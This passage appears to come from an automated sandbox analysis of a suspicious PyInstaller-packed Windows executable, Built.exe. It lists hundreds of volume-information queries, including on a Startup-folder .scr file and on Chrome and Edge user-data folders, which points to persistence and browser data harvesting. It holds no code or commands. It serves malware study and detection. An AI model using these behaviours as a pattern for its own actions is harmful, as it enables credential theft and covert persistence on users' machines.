Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
